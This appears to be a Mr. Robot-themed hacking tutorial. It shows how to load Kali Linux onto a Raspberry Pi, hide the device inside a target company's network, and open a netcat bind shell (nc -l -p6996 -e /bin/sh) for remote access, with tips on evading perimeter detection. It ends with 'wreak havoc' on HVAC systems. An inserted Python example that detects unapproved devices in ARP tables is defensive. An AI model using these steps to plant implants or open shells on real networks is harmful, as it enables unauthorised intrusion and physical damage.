The first step, of course, is to download the ARM version of Kali. Raspberry Pi and many mobile devices use ARM CPUs as they are more energy efficient and cooler, so the Kali operating system must be compiled specifically for it.
Fortunately, the good folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi file. Once you have downloaded the image, unzip it with WinRAR, WinZip, or any other archiving tool that can unzip files.
Step 2
Download & Install Win32 Disk Imager
Now we need to install Win32 Disk Imager, which you can download from SourceForge. This tool enables us to write the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB. You can buy a 16 GB card now for about 7 dollars.
Step 3
Run Disk Imager
Now that you have installed Disk Imager, right-click on it and run it as "administrator."
Select the Kali image in the "Image File" window, direct the image to your SD card in the "Device" window, then click on the "Write" button. Be patient, this can take some time.
If you are using Linux, things are a bit simpler. There is no need to download anything; you simply use the dd command (among other things, dd is used to create disk images in digital forensics). If we assume the image is named Kali-RPI.img, the SD card is at /dev/sdc, and we want to copy in a 512k block size (bs), then we simply need to type:
kali > dd if=Kali-RPI.img of=/dev/sdc bs=512k
Confirm the device name before running this, because dd overwrites whatever device "of" points to.
Step 4
Install the SD Card in the Raspberry Pi
Now we need to remove the SD card from the PC, install it in the Raspberry Pi, and boot it up. When it boots, it takes you to a command line prompt asking for your username and password. Type in:
username: root
password: toor
Then type:
kali > startx
This starts the X11 GUI for Kali. Success! Now you have a tiny Kali hacking tool that can be placed anywhere!
Step 5
Start a Cryptcat Listener on Raspberry Pi
Now that we have Raspberry Pi running Kali, we can place it anywhere within the Evil Corporation network. Raspberry Pi has an Ethernet connection and you can add a wireless adapter. The Raspberry Pi is so small it can be hidden in numerous places without being noticed, such as inside a desktop computer, a telephone, a clock, etc.
Once it is connected, we can start a Netcat listener (Netcat is built into Kali) on it by typing:
kali > nc -l -p6996 -e /bin/sh
This will enable Elliott to connect to a terminal on the Raspberry Pi from anywhere using port 6996.
Now, Elliott can connect back to the Raspberry Pi by using Netcat on his Kali system and typing:
kali > nc 192.168.1.105 6996
When he types ifconfig, he can see that he has a terminal on the Raspberry Pi ready to do some hacking of Evil Corp's HVAC system! Make certain to use the IP address of the Raspberry Pi in your environment.
Of course, there are other methods of connecting back to the Raspberry Pi. He could use SSH, and if he wanted a GUI, he could install the VNC Server and connect back to it with full GUI control over Kali. The problem with both of those methods is that they are more likely to be detected by Evil Corporation's perimeter network defenses.
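Seen from the defender's side, a planted device like this still has to show up in the neighbour (ARP) table of the segment it is plugged into. The following is an added example, not part of the original post: it compares `ip neigh` output against an asset inventory and flags unapproved MAC addresses, noting those with a Raspberry Pi vendor prefix. The inventory, the sample output, and the function name are constructed for illustration.

```python
import re

# OUI prefixes registered to Raspberry Pi (onboard Ethernet/Wi-Fi). A USB
# adapter carries its own vendor prefix, so the inventory check is the
# primary signal and the OUI match is only an extra hint.
RPI_OUIS = {"b8:27:eb", "dc:a6:32", "e4:5f:01"}

# Constructed asset inventory: MAC addresses approved for this segment.
INVENTORY = {
    "00:1a:2b:3c:4d:5e": "hvac-controller",
    "00:1a:2b:3c:4d:5f": "file-server",
}

# Constructed `ip neigh` output from a gateway on 192.168.1.0/24.
SAMPLE_NEIGH = """\
192.168.1.10 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.1.20 dev eth0 lladdr 00:1A:2B:3C:4D:5F STALE
192.168.1.105 dev eth0 lladdr b8:27:eb:aa:bb:cc REACHABLE
192.168.1.77 dev eth0 lladdr 3c:52:82:11:22:33 router DELAY
192.168.1.200 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def find_unknown_devices(neigh_output, inventory):
    """Return one dict per neighbour whose MAC is not in the inventory."""
    findings = []
    for line in neigh_output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if not m:  # FAILED/INCOMPLETE entries have no lladdr to check
            continue
        mac = m.group("mac").lower()  # normalise case before comparing
        if mac in inventory:
            continue
        findings.append({"ip": m.group("ip"), "mac": mac,
                         "raspberry_pi_oui": mac[:8] in RPI_OUIS})
    return findings

if __name__ == "__main__":
    for f in find_unknown_devices(SAMPLE_NEIGH, INVENTORY):
        tag = "Raspberry Pi OUI" if f["raspberry_pi_oui"] else "other vendor"
        print(f"ALERT unapproved device {f['ip']} {f['mac']} ({tag})")
```
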
Step 6
Wreak Havoc
Now that Elliott has a Kali installation within Evil Corporation's network, he should be able to use the multitude of tools available for wreaking havoc on Evil Corporation in Kali. In episode 4, he wants to control the HVAC system and turn up the heat to melt the backup tapes. He should be able to do that now that he has embedded Kali within Evil Corporation's network.